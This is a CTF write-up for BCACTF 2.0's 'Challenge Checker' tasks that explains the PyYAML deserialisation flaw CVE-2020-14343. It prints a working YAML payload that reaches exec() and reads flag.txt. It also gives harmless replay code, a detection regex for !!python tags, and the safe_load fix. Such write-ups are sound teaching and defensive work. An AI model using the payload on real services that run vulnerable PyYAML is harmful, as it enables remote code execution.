Zeyu's CTF Writeups
BCACTF 2.0
Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).
Challenge Checker 1
We are prompted to paste in YAML data. We can see from the code that yaml.load() is used to load the data.
```python
from yaml import load

...

def check(raw_data) -> "Tuple[list[str], list[str]]":
    # No Loader= argument: in PyYAML 3.13 this is the unrestricted Loader,
    # and in 5.1 to 5.3 it falls back to FullLoader (with a warning).
    data = load(raw_data)
```
There exists a deserialization vulnerability in PyYAML that was only fixed in version 5.4. Calling load() without a Loader argument lets the document construct arbitrary Python objects through !!python/... tags: in 3.x the default is the unrestricted Loader, and in 5.1 to 5.3 the default FullLoader was meant to block this but can still be tricked into calling arbitrary functions (CVE-2020-14343). The fix is to parse untrusted input with yaml.safe_load(), which never resolves those tags.
Issue: https://github.com/yaml/pyyaml/issues/420
GitHub Advisory (CVE-2020-14343): https://github.com/advisories/GHSA-8q59-q68h-6hv4
We can see from requirements.txt that the version is 3.13, which is vulnerable.
```
PyYAML==3.13
termcolor==1.1.0
```
From the GitHub issue, we can find some of the proof of concept exploits. For instance:
```yaml
- !!python/object/new:str
  args: []
  state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
```
So, in the chall.yaml, I simply added this PoC under authors:
```yaml
authors:
  - anli
  - Edward Feng
  - !!python/object/new:str
    args: []
    state: !!python/tuple
      - "print(open('flag.txt').read())"
      - !!python/object/new:staticmethod
        args: [0]
        state:
          update: !!python/name:exec
visible: true
```
This executes print(open('flag.txt').read()) and prints the flag. The chain works because PyYAML restores an object's state from the state: key. For a str instance, which has no __dict__, a two-element tuple state is split into (state, slotstate) and slotstate.update(state) is called. Here slotstate is the staticmethod whose update attribute was set to exec by its own state: mapping, so that call becomes exec("print(open('flag.txt').read())").
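To see why the PoC ends in exec(), here is an added example (my own code, not from this writeup and not PyYAML's code) that replays the same constructor steps in plain Python, with no PyYAML installed. The two helpers are simplified copies of what PyYAML's constructor does for !!python/object/new: tags and for the state: key, trimmed to the paths the PoC uses; treat their exact control flow as an assumption about the library. CHALL_YAML is a constructed copy of the payload above, and find_python_tags is a pre-parse check a defender could run before handing input to any loader.

```python
import re

# Added example, not from the writeup or from PyYAML itself.  The helpers
# below are simplified copies of what PyYAML's constructor does for
# `!!python/object/new:NAME` and for the `state:` key (trimmed to the code
# paths the PoC exercises; the exact control flow is an assumption).

EXECUTED = []  # side-effect sink the replayed payload appends to


def set_python_instance_state(instance, state):
    """Simplified copy of PyYAML's set_python_instance_state().

    A 2-tuple state is split into (state, slotstate).  If the instance has
    no __dict__ (str does not), the remaining state is handed to
    slotstate.update().  The PoC makes slotstate a staticmethod whose
    `update` attribute was replaced by exec, so that line is exec(payload).
    """
    if hasattr(instance, "__setstate__"):
        instance.__setstate__(state)
        return
    slotstate = {}
    if isinstance(state, tuple) and len(state) == 2:
        state, slotstate = state
    if hasattr(instance, "__dict__"):
        instance.__dict__.update(state)      # staticmethod: sets .update = exec
    elif state:
        slotstate.update(state)              # str: becomes exec(payload)
    for key, value in slotstate.items():     # a staticmethod has no .items()
        setattr(instance, key, value)


def construct_object_new(cls, args, state):
    """What `!!python/object/new:cls` with `args:` and `state:` boils down to."""
    instance = cls.__new__(cls, *args)
    if state:
        set_python_instance_state(instance, state)
    return instance


def replay_poc(payload):
    """Replay the PoC's two nested objects; return whatever the payload did."""
    EXECUTED.clear()
    # inner node: !!python/object/new:staticmethod {args: [0], state: {update: exec}}
    gadget = construct_object_new(staticmethod, [0], {"update": exec})
    assert gadget.update is exec
    # outer node: !!python/object/new:str {args: [], state: !!python/tuple [payload, gadget]}
    try:
        construct_object_new(str, [], (payload, gadget))
    except AttributeError:
        # exec has already fired by the time .items() is looked up on the
        # staticmethod; the simplified copy ends with the same loop as the
        # library, so the real loader is assumed to error out just as late.
        pass
    return list(EXECUTED)


# Constructed copy of the chall.yaml payload from the writeup, for the scanner.
CHALL_YAML = """\
authors:
  - anli
  - Edward Feng
  - !!python/object/new:str
    args: []
    state: !!python/tuple
      - "print(open('flag.txt').read())"
      - !!python/object/new:staticmethod
        args: [0]
        state:
          update: !!python/name:exec
visible: true
"""

PYTHON_TAG = re.compile(r"!!python/[\w/.:]+")


def find_python_tags(yaml_text):
    """Pre-parse check: every `!!python/...` tag in the document.

    Anything here means the input wants to construct Python objects; a
    checker that only expects strings and booleans should reject it (and
    parse with yaml.safe_load, which never resolves these tags anyway).
    """
    return PYTHON_TAG.findall(yaml_text)


if __name__ == "__main__":
    print(replay_poc("EXECUTED.append('payload ran')"))
    print(find_python_tags(CHALL_YAML))
```

The replay uses a harmless payload that appends to EXECUTED instead of reading flag.txt; swapping the string for the writeup's print(...) would behave the same way. The scanner is a cheap tripwire, not a substitute for safe_load: a document can still smuggle tags through anchors and odd spacing, so the loader choice is what actually closes the hole.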
Challenge Checker 2
The only change is that PyYAML is now version 5.3.1.
```
PyYAML==5.3.1
termcolor==1.1.0
```
But the exploit we used previously affects every version below 5.4 (in 5.3.1, load() without a Loader falls back to FullLoader, which is exactly what CVE-2020-14343 bypasses), so it works here too.